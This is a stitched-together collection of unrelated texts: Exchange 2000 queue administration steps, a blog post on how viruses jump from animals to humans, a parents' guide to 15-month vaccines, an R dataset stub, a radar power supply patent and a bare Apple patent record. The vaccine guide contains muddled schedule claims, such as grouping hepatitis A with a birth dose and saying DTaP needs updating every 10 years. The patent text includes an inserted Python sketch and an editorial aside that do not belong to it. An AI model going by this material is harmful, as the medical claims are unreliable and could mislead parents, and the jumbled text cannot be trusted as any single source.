Administrators can choose to enable or disable connections to queues. If connections are disabled, the queue is unable to route and deliver messages. You can change the queue state to Active by using the Force Connection command. When you do this, Exchange Server should immediately enable a connection for the queue, which will allow messages to be routed and delivered from it. You can force a connection to change the Retry or Scheduled state as well.
Other summary information that you may find useful in troubleshooting includes:
• Time Of Submission Of Oldest Msg - Tells you when the oldest message was sent by a client. Any time the oldest message has been in the queue for several days, you have a problem with message delivery. Either Exchange Server is having a problem routing that specific message, or a deeper routing problem may be affecting the organization.
• Total # Of Msgs - Tells you the total number of messages waiting in the queue. If you see a large number of messages waiting in the queue, you may have a connectivity or routing problem.
• Total Msg Size (KB) - Tells you the total size of all messages in the queue. Large messages can take a long time to deliver, and, as a result, they may slow down message delivery.
• Time Of Next Connection Retry - When the connection state is Retry, this column tells you when another connection attempt will be made. You can use Force Connection to attempt a connection immediately.

Viewing Message Details
Anytime a message is displayed in a queue, you can double-click it to view message details. The details provide additional information that identifies the message, including a message ID that you can use with message tracking.

Enabling and Disabling Connections to Queues
The only way to enable and disable connections to queues is on a global basis, which means that you enable or disable all queues for a given SMTP virtual server, MTA object, or connector. Enabling queues makes the queues available for routing and delivery. Disabling queues makes the queues unavailable for routing and delivery. To enable or disable connections to queues, follow these steps:
1. Start System Manager.
2. Navigate to the Queues node for the SMTP virtual server, MTA object, or connector you want to manage.
3.
To enable connections to all queues, right-click the Queues node, and then select Enable All Connections.
4. To disable connections to all queues, right-click the Queues node, and then select Disable All Connections.

Forcing Connections to Queues
In most cases you can change the queue state to Active by forcing a connection. Simply right-click the queue, and then select Force Connection. When you do this, Exchange Server should immediately enable connections to the queue, and this should allow messages to be routed and delivered from it.

Freezing and Unfreezing Queues
When you freeze a queue, all message transfer out of that queue stops. This means that messages can continue to enter the queue but no messages will leave it. To restore normal operations, you must unfreeze the queue. You freeze and then unfreeze a queue by completing the following steps:
1. Start System Manager, and then navigate to the queue you want to work with.
2. Enumerate the queue so that you can see the messages it contains.
3. Right-click the queue, and then select Freeze All Messages.
4. When you're done troubleshooting, right-click the queue, and then select Unfreeze All Messages.
Another way to freeze messages in a queue is to do so selectively. In this way, you can control the transport of a single message or several messages that may be causing problems on the server. For example, if a large message is delaying the delivery of other messages, you can freeze the message until other messages have left the queue. Afterward, you can unfreeze the message to resume normal delivery. To freeze and then unfreeze an individual message, complete the following steps:
1. Start System Manager, and then navigate to the queue you want to work with.
2. Enumerate messages in the queue.
3. Right-click the problem message, and then select Freeze.
4. When you're ready to resume delivery of the message, right-click the problem message, and then select Unfreeze.

Deleting Messages from Queues
You can remove messages from queues in several ways. To delete all messages in a queue, follow these steps:
1. Start System Manager, and then navigate to the queue you want to work with.
2. Enumerate the messages in the queue to make sure that you really want to delete all the messages that the queue contains.
3. Right-click the queue, and then select one of the following options:
• Delete All Messages (No NDR) - Deletes all messages from the queue without sending a nondelivery report to the sender
• Delete All Messages (Send NDR) - Deletes all messages from the queue and notifies the sender with a nondelivery report
4. When prompted, click Yes to confirm the deletion.
To delete messages selectively, follow these steps:
1. Start System Manager, and then navigate to the queue you want to work with.
2. Enumerate messages in the queue.
3. Right-click the message or messages that you want to delete, and then select one of the following options:
• Delete Messages (No NDR) - Deletes the selected messages from the queue without sending a nondelivery report to the sender.
• Delete Messages (Send NDR) - Deletes the selected messages from the queue and notifies the sender with a nondelivery report.
4. When prompted, click Yes to confirm the deletion.
Deleting messages from a queue removes them from the messaging system permanently. You can't recover the deleted messages.

From Microsoft Exchange 2000 Administrator's Pocket Consultant by William R. Stanek. Copyright © 1999 Microsoft Corporation.
How do viruses jump from animals to humans?
The recent coronavirus outbreak from China is believed to have originated from a wildlife market in the City of Wuhan. At the time of writing this post, it is believed that the source of the virus may have been a snake. Previous outbreaks of other coronaviruses, SARS and MERS, are believed to have jumped from civet cats and camels respectively, and other viruses like Ebola have animal origins. So that tells us what happened, but we want to know how. To explore that, first, we need to understand how viruses work.

Viruses are a type of organic parasite infecting nearly all forms of life. To survive and reproduce, they must move through three stages: contact with a susceptible host, infection and replication, and transmission to other individuals.
Ben Longdon: How do viruses jump from animals to humans? | TED Talk

In Ben Longdon's TED Talk, cited above, he explains that "Human viruses are covered in proteins adapted to bind with matching receptors on human respiratory cells." Once bound, the virus hijacks the cell's genetic material to replicate and infect other cells. The key point in the paragraph above is that the proteins around a virus are adapted to the target host. How does this happen? The key to this is rapid mutation.

… because viruses rapidly reproduce by the millions, they can quickly develop random mutations. Most mutations have no effect or even prove detrimental; but a small proportion may enable the pathogen to better infect a new species.
Ben Longdon: How do viruses jump from animals to humans? | TED Talk

The success of a mutated virus depends both on how well it is adapted to the new host and on how well it evades the host's immune response. Viruses are more likely to jump between hosts that are genetically similar than between those that are not. In the case of SARS and MERS, the virus is believed to have jumped to humans from other warm-blooded mammals.
Coronavirus: CDC/Dr. Fred Murphy

In the case of the new coronavirus from Wuhan (scientific name "2019 Novel Coronavirus" or "2019-nCoV"), if it jumped from a snake, this would seem to be a jump between two less-similar species.

What is a coronavirus?
Coronaviruses are common in different species of animals, including camels and bats. Most of these viruses affect animals, but not people, with a few notable exceptions, as noted above. Coronaviruses are so named because they have a halo, or crown-like appearance, when viewed under an electron microscope.

Check Out Ben Longdon's TED Talk
What to Expect When It's Time For Your Child's 15 Month Shots
The 15 month shots are administered during a routine checkup. However, the shots may vary depending on the pediatrician. You can generally expect your child to receive Hep A/B, DTaP, Hib, PCV, IPV, influenza, MMR, and varicella. (The Pentacel vaccine may be used as a replacement for some of these vaccines, to help minimize the number of injections your baby receives; ask your pediatrician about it.) Before you go to your child's 15-month check-up, it's helpful to know what the immunizations will help protect your baby against, as well as any possible side effects.

What are HepB and HepA?
Hepatitis A/B vaccinations should be given to a child at three intervals. Babies are given a shot at birth, between 2 and 4 months of age, and around 15 months. Hepatitis A and B are serious diseases that attack the liver. Watch for anything out of the ordinary after the shot is administered. Fevers, rashes, and any other unusual symptoms should be reported to your child's pediatrician. Infants with weakened immune systems or born prematurely are more susceptible to hepatitis A and B.

What is DTaP?
This vaccination is for diphtheria, tetanus, and pertussis. Diphtheria is a respiratory condition. Tetanus is lockjaw caused by bacteria found in soil, and pertussis is a form of whooping cough. Even though a child is fully vaccinated, they will need these updated every 10 years. They should receive five doses: at ages 2, 4, 6, and 15 to 18 months, with the last dose between 4 and 6 years old. If any side effects present after the initial doses, including constant crying for up to three hours after the shot or a fever of 105 degrees F, consult your pediatrician.

What is Hib?
The Hib vaccine is to protect against Haemophilus influenzae. Two or three doses are given before a child is 6 years of age. Pain at the injection site is common, as is a low-grade fever. However, this vaccination is well tolerated.

What is IPV?
IPV is a vaccination against polio that is given in the arm or the leg. It is given in four stages: at ages 2, 4, and 6 to 18 months, with another booster dose between 4 and 6 years of age. Any child who had a reaction previously or is allergic to the antibiotics streptomycin or polymyxin B should not take this vaccination.

Does my child need an influenza shot?
The influenza vaccine protects against influenza A and B. Though many people feel it is unnecessary, the flu can easily kill small children. The shot may make a child lethargic for a few days, but new formulas come with little to no side effects.

What is MMR?
The MMR vaccine protects against measles, mumps, and rubella (German measles). The live attenuated viruses of the three diseases are mixed and injected. Side effects can include a sore arm from the injection, fever, rash, and joint pain.

What is varicella?
Varicella helps to protect a child from chicken pox, which is caused by the varicella-zoster virus. It is made from live but weakened parts of the virus. The first dose is given at around 15 months of age. The only side effects reported are pain at the injection site and a mild rash.

Knowing what shots your child needs, the possible side effects, and the necessity of each of these vaccinations is important. Arm yourself with knowledge so that you can take appropriate action if something unforeseen should happen.
R/data.R

#' Example Bivariate Classification Data
#'
#' @details These data are a simplified version of the segmentation data contained
#' in `caret`. There are three columns: `A` and `B` are predictors and the column
#' `Class` is a factor with levels "One" and "Two". There are three data sets:
#' one for training (n = 1009), validation (n = 300), and testing (n = 710).
#'
#' @name bivariate
#' @aliases bivariate_train bivariate_test bivariate_val
#' @docType data
#' @return \item{bivariate_train, bivariate_test, bivariate_val}{tibbles}
#'
#' @keywords datasets
#' @examples
#' data(bivariate)
NULL
Title: RADAR POWER SUPPLY United States Patent 3740640 Abstract: A radar power supply charges a pulse network in a sequence of high frequency charging pulses. Transformation, providing isolation and voltage boost between the primary power source and the pulse network, performed at high frequency, minimizes transformer size and weight. Means are provided for selectively adjusting the number of charging pulses and damping the last of the charging pulses, thereby eliminating requirements for filtering and precise regulation of primary power source while affording precise regulation of the voltage of the output energy pulse. Inventors: Ravas, Richard J. (Monroeville, PA) Pittman, Paul F. (Pittsburgh, PA) Saletta, Gary F. (Pittsburgh, PA) Application Number: 05/079179 Publication Date: 06/19/1973 Filing Date: 10/08/1970 Assignee: Westinghouse Electric Corporation (Pittsburgh, PA) Primary Class: Other Classes: 307/108, 327/482, 342/175 International Classes: G01S7/282; H02M3/04; H03K3/57; (IPC1-7): G05F1/56; H03K17/60 Field of Search: 321/2,45C,15,21 323 View Patent Images: Foreign References: CA676761A Primary Examiner: Goldberg, Gerald Claims: We claim as our invention 1. A power supply comprising: 2. A power supply as recited in claim 1 wherein said de-Q network includes: 3. In a power supply including a transformer having primary and secondary windings, wherein the secondary winding is connected in a secondary circuit including a series connected uni-directional conducting means to a storage means, the method of operating comprising: 4. In a power supply including a transformer having primary and secondary windings, wherein the secondary winding is connected in a secondary circuit including a series-connected uni-directional conducting means to a storage means, the method of operation comprising: 5. Power supply circuitry for repeatedly varying the energy level of a storage means to thereby provide an output signal thereacross of a desired magnitude, said circuitry comprising: 6. Power supply circuitry as claimed in claim 5, wherein said control means is responsive to the termination of the current flow in said secondary winding for initiating the application of a pulse-like signal to said primary winding. 7. Power supply circuitry as claimed in claim 5, wherein said control means is responsive to the application of a predetermined number of pulse-like signals to said primary winding for terminating the further application of the pulse-like signals to said primary winding. 8. A power supply comprising: 9. A power supply as recited in claim 8 wherein there is further provided: 10. A power supply as recited in claim 8 wherein there is further provided: 11. A power supply as recited in claim 8 wherein said switching means comprises a switching transistor having its collector-emitter conducting path connected in series with said primary winding in said primary circuit. 12. A power supply as recited in claim 8 wherein said switching means comprises a resonant commutated thyristor network. 13. A power supply as recited in claim 12 wherein: 14. A power supply as claimed in claim 8, wherein said transformer includes a gapped core. Description: BACKGROUND OF THE INVENTION 1. Field of the Invention This invention relates to a radar power supply and, more particularly, to such a power supply employing a high frequency pulse charging network enabling substantial size and weight reductions in the power supply rendering it ideally suited for use in airborne and space vehicles. 2. 
Description of the Prior Art Radar power supply systems of various types are well known in the art. The primary power sources for such systems typically include three-phase, 240 volt AC electrical power of 50, 60, or 400 Hz. The power requirement of a radar output device, however, is a high voltage, well-regulated pulse which is supplied to a suitable microwave generator. In prior art systems, transformation of the relatively low level, AC voltage of the primary power supply to the high level DC voltage required for the output pulse of the radar power supply is achieved by fundamental frequency transformation and rectification with fundamental frequency filtering. The conventional prior art system employs a DC resonant charging circuit for charging an energy storage element to a high level DC voltage. The resulting pulse network voltage must be independent of input voltage variations or ripple from the primary power supply and also must be independent of the nature of the load pulse intervals, i.e., whether regular and periodic, or random. Typically, the system power supply is connected through a unidirectional conducting element, such as a diode, and a charging inductor to the pulse network. The pulse network in turn is connected to the primary of a coupling transformer, the secondary of which is connected to the load, for example, a microwave generator. A switch such as a thyratron is connected across the pulse network and the output coupling circuit. With the switch in its off or non-conducting state, the system power supply charges the pulse network through the diode and charging inductor, the charging inductor cooperating with the pulse network to increase the charge across the latter in a conventional DC resonant charging operation. The thyratron switch is turned on upon completion of the charging, as described, for generating each output pulse. When the switch is in the on condition, an effective short circuit is established, connecting the pulse network to the coupling transformer and thereby transferring the energy stored in the pulse network to the load. Prior art systems of the type described require ripple filtration circuits for removing the ripple frequency from the rectified AC power source voltage, and voltage regulation circuits for controlling the amplitude of the voltage developed at the pulse network, ultimately to be coupled to the load. The power supply filtering typically is achieved by large LC (inductive-capacitive) low-pass filters, and regulation is typically achieved by adjusting the Q of the resonant charging circuit. In view of the relatively high power requirements of the utilization devices, e.g., microwave generators, conventional radar power supplies are of undesirably large size and weight, factors of substantial concern in use of such systems in airborne and space vehicles. Consideration therefore has been given to techniques for reducing the size and weight factors. In conventional circuits, the only element that can be controlled to reduce size and weight is the charging inductor. However, certain limitations are imposed on the characteristics of the charging inductor required by such circuits. For example, if the size of the charging inductor is reduced for realizing a reduction in weight, the primary power source must produce a much higher peak current, albeit over a shorter period of time. 
Although the weight and size of the inductor may be reduced, a primary power supply having higher voltage and peak current capability is required with commensurate problems of increased weight and size. Conversely, by making the inductor larger, the peak current required to be drawn may be reduced but only with a commensurate increase in the charging time. The charging time, however, must be limited in accordance with the required pulse repetition frequency of the system. These and other problems are overcome by the radar power supply of the invention through the technique of charging the network in a sequence of pulses. Whereas prior art systems require complex circuits to provide the necessary regulation and filtering, these functions are readily achieved in the system of the invention by controlling the number of charging pulses and, if better regulation is needed, adjusting the Q of the circuit during the last of such pulses to provide a well-regulated, ripple-free high power output pulse. SUMMARY OF THE INVENTION In accordance with the invention, high frequency charging techniques are employed, permitting a significant reduction in the weight and size of the radar power supply both through reduction of the transformer requirements in view of high frequency operation and by complete elimination of the massive charging inductor required in prior art circuit designs. The primary power supply provides a DC voltage derived by rectification of a multi-phase AC voltage of conventional voltage level and frequency. The AC voltage is passed through a full wave bridge rectifier, the output of which is supplied to a high frequency bypass filter, the latter, however, not being provided for ripple smoothing but merely to eliminate high frequency transients which may occur sporadically in the AC supply. The thus filtered DC voltage is supplied to the primary of a special coupling transformer connected in series with a switching transistor. The secondary of the transformer is connected through a diode to the pulse network. The coupling transformer employs a gapped core structure, enabling it to function as an inductive energy storage element. By appropriate selection of the relative polarity senses of the primary and secondary transformer windings, when the switching transistor is rendered conductive, the diode in the secondary circuit is reverse biased. The secondary winding therefore appears unloaded, looking at it from the primary winding. All energy which flows from the charging or primary power supply is stored in the air gap of the transformer. The transistor is then switched off, inducing a voltage in the secondary of opposite polarity, and thus poled for conduction of the diode. As a result, the stored inductive energy previously developed in the air gap of the special transformer is released, and current flows in the secondary circuit thus charging the pulse network. The pulse network is charged in this manner by a succession of pulses, each successive pulse necessarily being required to exceed the voltage level developed across the pulse network in prior pulsing steps. The number of pulsing steps may be preselected, or a suitable voltage sensor may be employed to define the number of pulses required, for developing the desired output voltage pulse. 
In operation, the primary of the transformer is not a portion of a DC resonant charging circuit and, since primary and secondary currents never flow simultaneously, the voltage developed across the secondary of the coupling transformer can theoretically be infinite in value. In reality, the voltage developed across the secondary when the switching transistor is turned off is effectively determined by the voltage theretofore developed across the pulse network. In view of the effective isolation between the primary and the secondary windings, the transformer operates as an energy transfer device, first storing energy by virtue of primary current flow, when the transistor is conducting, and then discharging the stored energy of the primary winding circuit through the secondary winding circuit to the pulse network when the transistor blocks. The basic technique of the high frequency sequential pulse charging effected in accordance with the above-described circuit may also be employed in a resonant commutated thyristor network in accordance with a second disclosed embodiment of the invention. In accordance with either of the disclosed embodiments of the invention, the pulse network is charged with a large number of pulses at a relatively high pulse frequency permitting a substantial reduction in the inductive characteristics of the coupling transformer with commensurate weight and size reductions. Further, owing to the type of transformer connection used, the need for the conventional massive charging inductor is eliminated, resulting in further weight and size reductions. Regulation and filtering of the output pulse is readily accomplished by controlling the number of the successive step pulses. A de-"Q" network, including a damper winding coupled to the primary winding of the coupling transformer, can be actuated if needed for closer regulation when the output voltage across the pulse network reaches the desired voltage level. The damper winding dissipates a portion of the energy stored in the transformer, and prevents it from flowing to the output pulse network. Power supplies in accordance with the invention afford great versatility in use in that the capacitance of the pulse network or other load circuit may be increased to any required value without impairing the charging capability of the supply. In addition, plural such supplies can be employed in a parallel circuit configuration for energizing a charging network of lumped elements for increasing the total system power capacity and to provide redundancy. These and other advantages and improvements of the radar power supplies of the invention will be more readily apparent from the following detailed description of the invention. BRIEF DESCRIPTION OF THE DRAWINGS FIG. 1 is a schematic, partially in block diagram form, of a first embodiment of the radar power supply of the invention; FIGS. 1a and 1b are schematic diagrams representing the equivalent circuits of the system of FIG. 1 during two different, respectively associated, phases of the charging operation; FIG. 2 is a schematic diagram of a utilization circuit, such as a microwave generator, to be driven by the radar power supply of the invention; FIG. 3 is a schematic diagram, partially in block diagram form, of a second embodiment of the radar power supply of the invention employing a resonant commutated thyristor network; FIGS. 4a through 4f comprise, variously, current and voltage waveforms representing the operation of the circuit of FIG. 1; FIGS. 
5a through 5f comprise, variously, current and voltage waveforms representing the operation of the circuit of FIG. 3; and FIG. 6 is a schematic of a lumped pulse network employing plural power supplies in accordance with the invention. DETAILED DESCRIPTION OF THE INVENTION In FIG. 1 is shown a schematic, partially in block diagram form, of a radar power supply in accordance with the invention. Any suitable primary power supply may be employed providing a DC voltage VB, for example 300 VDC. As shown, the voltage VB is obtained from a conventional power source of three-phase alternating current of 240 volts and of from 50 or 60 to 400 Hz. The three-phase power is provided through a full wave rectifier 10, the output of which is supplied to a high frequency bypass filter 12. As will hereinafter appear, the radar power supply of the invention does not require precise regulation of the input DC voltage and particularly can tolerate a certain amount of voltage variations or ripple in the DC voltage. Thus, the high frequency bypass filter 12 is provided only to filter out any high frequency transient voltages which may appear in the supply. A special coupling transformer T has a gapped core structure, and includes a primary winding P connected in series with a power switching transistor 14 to the primary power source. The secondary S of the transformer T, poled as indicated, is connected in series with a diode D across the terminals of a pulse or storage network PN. Terminals 16 and 18 represent connections to a utilization device, not shown in FIG. 1 but typically comprising a microwave generator. Connected to the base of the switching transistor 14 is a pulsing control circuit 20. For a reason to be explained, the pulsing control circuit 20 includes a first input associated with a sense winding 22 and a second input derived from a comparator 24, the latter also being connected to the sense winding 22. As also later explained, the system may further include a de-Q network 26 comprising a dissipative element 27, a winding 28 coupled to the primary winding P of transformer T, and a switch 29. The switch 29 is actuated at a specified time by the pulse control circuit 20. FIG. 2 comprises a schematic illustrating a suitable utilization device for FIG. 1. Connected to the terminals 16' and 18', respectively corresponding to the terminals 16 and 18 in FIG. 1, is a switch 30 and a primary 32 of a coupling transformer 34, the secondary winding 36 of which has connected across its terminals the ultimate utilization device 38 illustrated as a load RL and comprising, for example, a microwave generator. In operation of the circuit of FIG. 1, the pulsing control 20 serves to switch the power switching transistor 14 on and off a number of times for charging of the pulse network PN to the desired voltage level. The circuit response for each cycle of switching on and off of the transistor 14 will first be considered. When transistor 14 is initially switched to a conducting state, current flows from the primary power source through the series-connected primary winding P and the transistor 14, the primary winding P absorbing energy from the power supply. In view of the polarity sense of the windings P and S of transformer T, however, the voltage developed in the primary winding P and coupled to the secondary winding S does not cause a flow of current in the latter since the diode D is reverse biased. 
Thus, the secondary winding S appears to be unloaded, when looked at from the primary winding P, and the energy is stored by transformer T. FIG. 1a is a schematic of the effective charging circuit of the primary winding P. As previously noted, the secondary is isolated during the conducting interval of transistor 14, and thus the equation relating voltage drops in the primary winding circuit is:

VB = VP + VCE = LP (dIP/dt) + VCE (1)

where VB is the primary source voltage, VP is the voltage developed across the primary winding, VCE is the voltage across the collector-to-emitter terminals of the switching transistor, LP is the effective inductance of the transformer primary, and IP is the current in the primary winding. The energy which flows from the charging source VB is stored in the air gap of the transformer and has a magnitude:

W = (1/2) LP (IP')^2 (2)

where IP' is the peak transformer primary current.

When transistor 14 is turned off, the primary circuit becomes open-circuited and the current flow terminates. The voltage of the primary winding P reverses in polarity by Lenz's law in an attempt to maintain the previous current flow. The voltage induced in the secondary winding S likewise reverses in polarity and accordingly forward biases the diode D, whereby current flows in the secondary circuit to charge the pulse network PN. Thus, the energy stored in the transformer T is transferred to the secondary winding S and thence to the high voltage pulse network PN.

In FIG. 1b is shown the effective secondary charging circuit during the off interval of the transistor 14, during which interval current has ceased to flow in the primary winding P. As is apparent in FIG. 1b, the value of VP is determined by VPN as reflected back by the secondary winding S to the primary winding P. During the interval when transistor 14 is off, VP is independent of VB. Each time transistor 14 is turned off, a voltage VS is induced in the secondary winding exceeding the voltage developed across the pulse network PN by the energy stored therein, to effect continued charging of the latter by succeeding charging pulses. The magnitude of this voltage is not related to VB or to the transformer turns ratio, but is simply that value which, by overcoming the pulse network charge voltage, causes diode D to become conductive and allow secondary current to flow.

With reference to the waveforms of FIGS. 4a through 4f, the successive switching on and off of transistor 14 is represented in FIG. 4a, illustrating the collector-to-emitter voltage of transistor 14. With VB representing the primary source voltage, in the off state of the transistor the voltage VCE is equal to the sum of VB and a VP component, which is VPN reflected back by the turns ratio; in the on state, VCE is essentially zero volts. As previously noted, the transistor 14 is switched on and off a number of times sufficient to develop the desired voltage across the pulse network PN in FIG. 1, the switching being represented in FIG. 4a by a series of conducting intervals 1, 2, ... The current flow IP in the primary winding P resulting from the conducting intervals of transistor 14 is represented in FIG. 4b.
The inductance of the primary winding P is relatively high and, as a result, a generally linear increase in current during the conducting interval results, in accordance with:

dIP/dt = VB / LP (3)

where IP is the current in the primary winding; LP is the effective inductance of the primary winding P; VB is the primary DC source voltage as above identified; and the voltage drop across the transistor (VCE) during conduction is assumed to be negligible compared with VB.

The voltage VP of the primary winding P in the successive cycles is illustrated in FIG. 4c. Note that during the off interval, the primary voltage goes to zero when secondary current ceases. Since the secondary winding S is floating when the primary winding P is energized or excited, and similarly the primary is floating when the secondary is excited, there is no fixed ratio between the input voltage of the primary winding P when the transistor is conducting and the output voltage of the secondary winding S when the transistor is off. By providing a secondary-to-primary transformer voltage ratio of 100:1, for VB = 300 VDC, the output voltage will be in the range of 30 kVDC, depending upon the number of charging steps employed. If no de-Qing is used, the final pulse network energy can be regulated to ±1 pulse. For example, if the system is designed so that nominally twenty pulses are necessary to charge the pulse network to full voltage, the network energy will be within ±5 percent.

The waveform of the voltage VS induced in the secondary winding S and the resultant current pulses IS which flow in the secondary circuit for charging the pulse network PN are shown in FIGS. 4d and 4e, respectively. The secondary current IS increases rapidly upon termination of the current flow IP in the primary winding (FIG. 4b) and decreases as energy is transferred from the secondary winding S to the pulse network PN. Accordingly, the transformer T effects, during each pulsing cycle, an energy transfer wherein the energy stored in the air gap, (1/2)LP IP^2, is transferred, less losses, to the secondary, and ultimately to the pulse network PN as the energy (1/2)CV^2 for energization of the load. The resultant successive step charging of the pulse network PN is illustrated in the waveform of FIG. 4f.

As is apparent from the foregoing discussion of operation, the mutually exclusive floating conditions require that current flow in the primary winding P must not be initiated until current flow in the secondary winding S has decreased to zero. Accordingly, the pulsing control circuit 20 responds to the output of sense winding 22 to assure that transistor 14 is switched on only after that condition has obtained. As previously noted, the system may be designed to allow a predetermined number, n, of pulsing intervals for developing the requisite energy storage in the pulse network PN. Pulsing control circuit 20 may correspondingly include a counter preset to the desired number of pulsing intervals n to achieve the desired energy levels. When the preset count is attained, the control circuit 20 may also actuate the utilization circuit for receiving the output pulse from the pulse network PN, and then reset the counter to initiate a subsequent pulse charging cycle. Unfortunately, this technique alone produces an output voltage which is sensitive to regulation and ripple in VB as well as to load variations.
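To make the step-charging arithmetic concrete, here is a minimal Python sketch of the ideal (lossless) charging sequence. All component values are assumptions for illustration only; the patent gives VB = 300 VDC and the twenty-pulse example, but no component sizes, so the values below are simply chosen to land near the 30 kVDC figure quoted above.

```python
import math

L_P = 2e-3        # effective primary inductance, henries (assumed)
I_P_peak = 15.0   # peak primary current per charging pulse, amperes (assumed)
C_PN = 1e-8       # pulse-network capacitance, farads (assumed)

# Energy stored in the transformer air gap each cycle, per equation (2):
W_pulse = 0.5 * L_P * I_P_peak**2            # 0.225 J per pulse

# Lossless step charging: n * W_pulse = (1/2) * C_PN * V_n^2
for n in range(1, 21):
    V_n = math.sqrt(2 * n * W_pulse / C_PN)
    print(f"pulse {n:2d}: V_PN = {V_n / 1000:6.2f} kV")   # pulse 20: 30.00 kV
```

Because each pulse carries a fixed 5 percent of the twenty-pulse total, counting pulses alone bounds the stored energy to ±5 percent, which is exactly the granularity the de-Q network trims away on the final pulse.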
Alternatively, or in cooperation therewith, a comparator circuit 24 may be provided for responding to the output of sense winding 22 to produce a control input to pulsing control circuit 20 for terminating the succession of pulsing intervals when the desired output voltage level is attained. It is apparent that the IR drop in the secondary winding S will affect the output voltage sensed by the sense winding 22, and suitable correction for this should be provided; alternatively, the comparator may receive its sensed output voltage level directly from the pulse network PN to avoid this inaccuracy.

As hereinabove noted, a significant feature of the power supply of the invention is that the feedback system is not deleteriously affected by variations, or ripple, in the voltage from the primary power source and does not require filtering of the voltage applied to the pulse network PN charging circuit. Precise regulation of the final voltage obtained across the pulse network PN, and elimination of the ripple or voltage variations which may be present, is effected by selectively controlling the energy of the charging pulse during the last pulse interval. More particularly, the de-Q network 26 is switched into the circuit during the last pulse interval by the pulsing control circuit 20 which, illustratively, acts to close the switch 29 and complete the circuit between the dissipative element 27 and the winding 28. The damper winding 28 and the element 27 thus are coupled into the primary circuit when the output voltage reaches the desired level, dissipating the remaining energy stored in the transformer T rather than permitting it to flow as a current from the secondary winding S to the pulse network PN. This same function can be performed in a non-dissipative manner if desired; however, since each charging pulse represents only a small fraction of the desired output energy, for example, 5 percent in a 20-pulse design, even a completely dissipative network will cause only a commensurate, and thus relatively insignificant, system energy loss.

Numerous advantages of the radar power supply of the invention are apparent from the foregoing, and some are here reconsidered. The transformer T and, generally, the magnetics associated with the circuit are operated at high frequency, whereby the size and rating of the transformer may be reduced, providing both size and weight savings. The pulsing technique affords accurate and simplified control of the voltage level developed across the PN network and, by the de-Qing function performed during the last pulsing interval, provides precise regulation and ripple smoothing of the final output DC voltage level. Finally, the application of the de-Qing network during the last cycle provides a significant improvement in efficiency over the prior art, which employs de-Qing during a major portion of the charge cycle.

In FIG. 3 is shown a schematic, partially in block diagram form, of a second embodiment of a radar power supply in accordance with the invention. The system of FIG. 3 employs a resonant commutated thyristor network in the primary circuit for providing successive pulsing in developing the requisite charging of the pulse network. The system of FIG. 3 is in many respects identical to that of FIG. 1, and includes a full wave rectifier 10 and a low pass filter 12 for supplying the primary power supply voltage VB. The transformer T again includes primary and secondary windings P and S as in FIG.
1, the secondary circuit including a diode D and a pulse network PN in which the output pulse is developed for ultimate supply to a utilization circuit connected to terminals 16 and 18. In FIG. 3, however, the primary circuit includes a diode 40 connected in series with a resonant commutating circuit 42 including an inductor 43 and a capacitor 44. A gate controlled switching device such as a thyristor 46 is connected in shunt with the commutating circuit 42. A pulsing control circuit 48 supplies a trigger pulse to the gate of thyristor 46 and, as in FIG. 1, also actuates a switch of a de-Q network 50 associated with the primary winding P, the latter serving the identical function as the de-Q network 26 of FIG. 1.

The operation of the circuit may be explained with the aid of the waveforms of FIGS. 5a through 5f, which show voltage and current waveforms occurring as the network is charging. When the SCR 46 is gated on by the pulsing control circuit 48, an effective short circuit shunt path is produced across the commutating circuit 42, as represented by the current pulse ITh in FIG. 5a. The resultant flywheel action of the inductor 43 causes the voltage across the capacitor 44 to reverse in polarity, as illustrated in the waveform of FIG. 5b, commutating thyristor 46 to an off condition. Current now flows through the primary winding P of the transformer T, as shown in FIG. 5c, to re-establish the voltage across the capacitor 44 in the positive direction. The charging path includes the inductors comprising the primary winding P and inductor 43 of the commutating circuit 42. During this time, no secondary current flows, as shown in FIG. 5d. As shown in FIG. 5e, the transformer primary voltage, and the secondary voltage as well, decrease toward zero and then reverse polarity as primary current continues to flow into the capacitor 44. When the secondary voltage reaches the value of the voltage already on the pulse network PN, diode D conducts, causing current flow to be directed from the primary to the secondary as shown in FIGS. 5c and 5d. The flow of secondary current further charges the pulse network PN, raising its voltage level as shown in FIG. 5f. While diode D conducts secondary current, and during the interval after secondary current stops but before the thyristor is triggered, diode 40 prevents capacitor 44 from discharging back through transformer T. As was the case with the transistor circuit shown in FIG. 1, transformer T acts as a pump to first store energy from a source and then discharge it into a sink, or storage system, and particularly the PN network.

The system of FIG. 3 may be preferable for certain applications to that of FIG. 1. The transistor switch 14 of FIG. 1 must be capable of handling high power at high speed switching rates; the stringent requirements imposed on such an element are eliminated in the circuit of FIG. 3. In FIG. 3, termination of current flow in the primary circuit is effected by the diode D, the function of thyristor 46 being to trigger into operation the resonant commutating function of the circuit 42. Primary current IP flows when thyristor 46 is in its off state, and the resonant, or flywheel, action of the commutating circuit 42 itself provides for reverse biasing of the thyristor 46 to switch it back to its off state. The circuit of FIG. 3 further includes sensing and control circuits for the pulsing and de-Qing functions as described in relation to FIG. 1; these therefore are not shown or described here.
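As a quick numerical aside, the flywheel reversal described above occupies one half of the LC circuit's resonant period, which sets the commutation interval of thyristor 46. The values below are assumptions for illustration only; the patent gives no component values for inductor 43 or capacitor 44.

```python
import math

L_43 = 10e-6    # commutating inductor 43, henries (assumed)
C_44 = 0.1e-6   # commutating capacitor 44, farads (assumed)

# The capacitor-voltage reversal takes one half of the LC resonant period,
# after which thyristor 46 is reverse biased and turns off.
t_reversal = math.pi * math.sqrt(L_43 * C_44)
f_resonant = 1 / (2 * math.pi * math.sqrt(L_43 * C_44))
print(f"resonant frequency   ~ {f_resonant / 1e3:.0f} kHz")   # ~159 kHz
print(f"commutation interval ~ {t_reversal * 1e6:.2f} us")    # ~3.14 us
```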
In FIG. 6 is shown a schematic of a pulse network having coupled thereto a plurality of power supplies in accordance with the invention. The pulse network includes lumped capacitive elements 50 and inductors 52. Charging of each of the capacitive elements 50 is effected by current pulses induced in a secondary winding S' connected through a corresponding diode 54 to the respectively associated capacitor 50. The windings S' correspond to the secondary winding S of the system of either FIG. 1 or FIG. 3. Similarly, the primary windings P' in the circuit of FIG. 6 represent the primary circuit, including the primary winding P, of either of the systems of FIG. 1 or FIG. 3. Preferably, the characteristics of each corresponding power supply and charging network are matched to assure uniformity of the output pulses. It is apparent that various modifications may be made in the system described herein without departure from the scope of the invention. Accordingly, the invention is not to be considered limited by the description, but only by the scope of the appended claims.
Single-ended balance-coded interface with embedded-timing
United States Patent 6734811
Inventor: Cornelius; William (Los Gatos, CA)
Assignee: Apple Computer, Inc. (Cupertino, CA)
Application: 10/443,547
Filed: May 21, 2003
Date Issued: May 11, 2004
Primary Examiner: Young; Brian
Assistant Examiner: Nguyen; John
